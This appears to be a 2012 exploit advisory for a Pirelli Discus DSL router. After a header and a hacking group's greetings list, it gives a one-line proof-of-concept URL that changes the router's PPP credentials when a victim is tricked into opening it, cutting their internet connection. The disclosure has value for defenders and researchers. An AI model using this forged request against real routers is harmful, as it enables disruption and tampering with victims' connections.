Pirelli Discus DSL-DRGA112-07 suffers from a remote password changing vulnerability.
b147b18f5744141a03b067a5ef116be6ed6535457f53c7e3799f725a64550916
# Exploit Title: Pirelli Discus DSL-DRGA112-07 Remote Change Password
# Date: 17/02/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Hardware: Pirelli Discus DSL-DRGA112-07 DSL-DRGA112-07
# Tested on: Linux
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion, ksha, zerial,LinuxFer, Scorp
her0, r0dr1 y demas user de RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
failure may be exploited if the attacker makes his victim enter the
following URL:
http://10.0.0.2/wansinglecfg.cmd?action=modify&UsernamePPP = [number]
& PasswordPPP = [password]
automatically be reset his connection with new data and therefore
will not have internet connection and your data will be modified.
[Exploit]
-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com